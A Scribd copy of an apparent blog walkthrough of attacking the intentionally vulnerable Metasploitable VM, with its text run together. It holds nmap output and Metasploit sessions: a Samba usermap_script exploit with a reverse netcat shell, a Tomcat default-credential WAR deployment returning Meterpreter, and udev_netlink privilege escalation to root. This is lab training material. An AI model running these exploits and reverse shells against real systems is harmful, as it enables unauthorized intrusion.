Scribd Logo
Hochladen

Willkommen bei Scribd!

  • The Evil Bit Blog - Metasploitable Walkthrough

    Hochgeladen von

    clu5t3r
    164 Ansichten7 Seiten
    The document describes exploiting vulnerabilities on the Metasploitable virtual machine to gain unauthorized access. In the first method, the document uses Metasploit to exploit a vulnerability in Samba version 3.0.20 to execute a reverse shell and obtain a root shell on the target system. The second method uses credentials of "tomcat/tomcat" to access the Tomcat manager interface on port 8180. Metasploit is used to deploy a Java payload that returns a Meterpreter session as the tomcat55 user. Local privilege escalation is then achieved using a vulnerability in how Linux handles netlink sockets to execute a root shell.

    Originalbeschreibung:

    The Evil Bit Blog - Metasploitable Walkthrough

    Copyright

    © © All Rights Reserved

    Verfügbare Formate

    PDF, TXT oder online auf Scribd lesen

    Stufen Sie dieses Dokument als nützlich ein?

    Sind diese Inhalte unangemessen?

    Dieses Dokument melden
    The document describes exploiting vulnerabilities on the Metasploitable virtual machine to gain unauthorized access. In the first method, the document uses Metasploit to exploit a vulnerability in Samba version 3.0.20 to execute a reverse shell and obtain a root shell on the target system. The second method uses credentials of "tomcat/tomcat" to access the Tomcat manager interface on port 8180. Metasploit is used to deploy a Java payload that returns a Meterpreter session as the tomcat55 user. Local privilege escalation is then achieved using a vulnerability in how Linux handles netlink sockets to execute a root shell.

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    164 Ansichten7 Seiten

    The Evil Bit Blog - Metasploitable Walkthrough

    Hochgeladen von

    clu5t3r
    The document describes exploiting vulnerabilities on the Metasploitable virtual machine to gain unauthorized access. In the first method, the document uses Metasploit to exploit a vulnerability in Samba version 3.0.20 to execute a reverse shell and obtain a root shell on the target system. The second method uses credentials of "tomcat/tomcat" to access the Tomcat manager interface on port 8180. Metasploit is used to deploy a Java payload that returns a Meterpreter session as the tomcat55 user. Local privilege escalation is then achieved using a vulnerability in how Linux handles netlink sockets to execute a root shell.

    Copyright:

    © All Rights Reserved
    Als PDF, TXT herunterladen oder online auf Scribd lesen
    Markieren Sie unangemessene Inhalte
    von 7

    MetasploitableWalkthrough

    Metasploitable is another vulnerable VM designed to practice penetration testing, and especially Metasploit. I could use
    manualmethodslikeinthepreviouscases,butIdecidedtouseMetasploitfortheexploitation.
    IstartedwithNMAPasusual:
    root@kali:~#nmapsSA192.168.1.22
    StartingNmap6.40(http://nmap.org)at2013110921:28CET
    Nmapscanreportfor192.168.1.22
    Hostisup(0.0022slatency).
    Notshown:988closedports
    PORTSTATESERVICEVERSION
    21/tcpopenftpProFTPD1.3.1
    22/tcpopensshOpenSSH4.7p1Debian8ubuntu1(protocol2.0)
    |sshhostkey:102460:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd(DSA)
    |_204856:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3(RSA)
    23/tcpopentelnetLinuxtelnetd
    25/tcpopensmtpPostfixsmtpd
    |_smtpcommands:metasploitable.localdomain,PIPELINING,SIZE10240000,VRFY,ETRN,
    STARTTLS,ENHANCEDSTATUSCODES,8BITMIME,DSN,
    |sslcert:Subject:commonName=ubuntu804
    base.localdomain/organizationName=OCOSA/stateOrProvinceName=Thereisnosuchthingoutside
    US/countryName=XX
    |Notvalidbefore:20100317T14:07:45+00:00
    |_Notvalidafter:20100416T13:07:45+00:00
    |_ssldate:20131109T20:28:17+00:002sfromlocaltime.
    53/tcpopendomainISCBIND9.4.2
    |dnsnsid:
    |_bind.version:9.4.2
    80/tcpopenhttpApachehttpd2.2.8((Ubuntu)PHP/5.2.42ubuntu5.10with
    SuhosinPatch)
    |httpmethods:Potentiallyriskymethods:TRACE
    |_Seehttp://nmap.org/nsedoc/scripts/httpmethods.html
    |_httptitle:Sitedoesn'thaveatitle(text/html).
    139/tcpopennetbiosssnSambasmbd3.X(workgroup:WORKGROUP)
    445/tcpopennetbiosssnSambasmbd3.X(workgroup:WORKGROUP)
    3306/tcpopenmysqlMySQL5.0.51a3ubuntu5
    |mysqlinfo:Protocol:10
    |Version:5.0.51a3ubuntu5
    |ThreadID:8
    |SomeCapabilities:ConnectwithDB,Compress,SSL,Transactions,SecureConnection
    |Status:Autocommit
    |_Salt:V&Vbg^%8+nhCQQ"PQ%bB
    5432/tcpopenpostgresqlPostgreSQLDB8.3.08.3.7
    8009/tcpopenajp13ApacheJserv(Protocolv1.3)
    |_ajpmethods:FailedtogetavalidresponsefortheOPTIONrequest
    8180/tcpopenhttpApacheTomcat/CoyoteJSPengine1.1
    |_httpfavicon:ApacheTomcat
    |_httpmethods:NoAlloworPublicheaderinOPTIONSresponse(statuscode200)
    |_httptitle:ApacheTomcat/5.5

    MACAddress:00:0C:29:0E:5C:5B(VMware)
    Devicetype:generalpurpose
    Running:Linux2.6.X
    OSCPE:cpe:/o:linux:linux_kernel:2.6
    OSdetails:Linux2.6.92.6.33
    NetworkDistance:1hop
    ServiceInfo:Host:metasploitable.localdomainOSs:Unix,LinuxCPE:
    cpe:/o:linux:linux_kernel
    Hostscriptresults:
    |_nbstat:NetBIOSname:METASPLOITABLE,NetBIOSuser:<unknown>,NetBIOSMAC:<unknown>
    |smbosdiscovery:
    |OS:Unix(Samba3.0.20Debian)
    |NetBIOScomputername:
    |Workgroup:WORKGROUP
    |_Systemtime:20131109T15:28:1705:00
    TRACEROUTE
    HOPRTTADDRESS
    12.16ms192.168.1.22
    OSandServicedetectionperformed.Pleasereportanyincorrectresultsat
    http://nmap.org/submit/.
    Nmapdone:1IPaddress(1hostup)scannedin17.00seconds
    AseverythingistooeasywithMetasploitIwillshowtwomethods.

    Method1Samba

    IfwedoaGooglesearchforSamba3.0.20exploit,werunintothefollowingwebpage:
    http://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
    whichisexactlytheMSFmoduleweneed.ConfiguringandrunningMSF:
    msfexploit(usermap_script)>setRHOST192.168.1.22
    msfexploit(usermap_script)>setpayloadcmd/unix/reverse_netcat
    msfexploit(usermap_script)>setLHOST192.168.1.17
    msfexploit(usermap_script)>showoptions
    Moduleoptions(exploit/multi/samba/usermap_script):
    NameCurrentSettingRequiredDescription

    RHOST192.168.1.22yesThetargetaddress
    RPORT139yesThetargetport

    Payloadoptions(cmd/unix/reverse_netcat):
    NameCurrentSettingRequiredDescription

    LHOST192.168.1.17yesThelistenaddress
    LPORT4444yesThelistenport

    Exploittarget:
    IdName

    0Automatic

    msfexploit(usermap_script)>exploit
    [*]Startedreversehandleron192.168.1.17:4444
    [*]Commandshellsession1opened(192.168.1.17:4444>192.168.1.22:59321)at20131109
    21:46:52+0100
    pythonc'importptypty.spawn("/bin/bash")'
    root@metasploitable:/#id
    id
    uid=0(root)gid=0(root)
    root@metasploitable:/#
    AsSambawasrunningwithrootprivilegeswearedone...

    Method2viaTomcatManager+UDEVNetlinklocalexploit
    ThereisaTomcatserviceatport8180,andifwenavigatetoitwecanfindthedefaultlinks,tothemanager,adminpage
    and so on. If we do a quick Google search we can find that the default Tomcat manager username and password are
    tomcat/tomcat.Itriedanditreallyworked.Nowweonlyneedtheexploit:
    http://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy
    HereistherelatedMSFconfigration:
    msfexploit(tomcat_mgr_deploy)>showoptions
    Moduleoptions(exploit/multi/http/tomcat_mgr_deploy):
    NameCurrentSettingRequiredDescription

    PASSWORDtomcatnoThepasswordforthespecifiedusername
    PATH/manageryesTheURIpathofthemanagerapp(/deployand
    /undeploywillbeused)
    ProxiesnoUseaproxychain
    RHOST192.168.1.22yesThetargetaddress
    RPORT8180yesThetargetport
    USERNAMEtomcatnoTheusernametoauthenticateas
    VHOSTnoHTTPservervirtualhost

    Payloadoptions(java/meterpreter/reverse_tcp):
    NameCurrentSettingRequiredDescription

    LHOST192.168.1.17yesThelistenaddress
    LPORT4444yesThelistenport

    Exploittarget:
    IdName

    0Automatic

    msfexploit(tomcat_mgr_deploy)>exploit
    [*]Startedreversehandleron192.168.1.17:4444
    [*]Attemptingtoautomaticallyselectatarget...
    [*]Automaticallyselectedtarget"Linuxx86"
    [*]Uploading6462bytesasYd0glyiN6vrkhM.war...
    [*]Executing/Yd0glyiN6vrkhM/Ak0iJcrqppzQUwP7xB.jsp...
    [*]UndeployingYd0glyiN6vrkhM...
    [*]Sendingstage(30355bytes)to192.168.1.22
    [*]Meterpretersession2opened(192.168.1.17:4444>192.168.1.22:42541)at20131109
    22:06:25+0100
    meterpreter>sysinfo
    Computer:metasploitable
    OS:Linux2.6.2416server(i386)
    Meterpreter:java/java
    meterpreter>getuid
    Serverusername:tomcat55

    Aswecanseewearenotrootyet,butalimitedtomcat55account.Let'sputmeterpretertothebackground('background'
    command)andlookforalocalrootexploit.
    Ipickedupthefollowing:
    http://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink

    meterpreter>background
    [*]Backgroundingsession3...
    msfexploit(tomcat_mgr_deploy)>useexploit/linux/local/
    useexploit/linux/local/hp_smhstartuseexploit/linux/local/sock_sendpageuse
    exploit/linux/local/zpanel_zsudo
    useexploit/linux/local/kloxo_lxsuexecuseexploit/linux/local/udev_netlink
    msfexploit(tomcat_mgr_deploy)>useexploit/linux/local/udev_netlink
    msfexploit(udev_netlink)>setSESSION3
    SESSION=>3
    msfexploit(udev_netlink)>showoptions
    Moduleoptions(exploit/linux/local/udev_netlink):
    NameCurrentSettingRequiredDescription

    NetlinkPIDnoUsuallyudevdpid1.Meterpretersessionswill
    autodetect
    SESSIONyesThesessiontorunthismoduleon.
    WritableDir/tmpyesAdirectorywherewecanwritefiles(mustnot
    bemountednoexec)

    Exploittarget:
    IdName

    0Linuxx86

    msfexploit(udev_netlink)>exploit
    [*]Startedreversehandleron192.168.1.17:4444
    [*]Attemptingtoautodetectnetlinkpid...
    [*]Meterpretersession,usingget_processestofindnetlinkpid
    [*]udevpid:2991
    [+]Foundnetlinkpid:2990
    [*]Writingpayloadexecutable(259bytes)to/tmp/IQBLahEWgL
    [*]Writingexploitexecutable(1879bytes)to/tmp/pGynSspMQB
    [*]chmod'ingandrunningit...
    [*]Commandshellsession4opened(192.168.1.17:4444>192.168.1.22:48408)at20131109
    22:14:30+0100
    id
    uid=0(root)gid=0(root)

    ...andweareroot.
    Therearemoremethods,butIwillleavethemtoyou.

    Das könnte Ihnen auch gefallen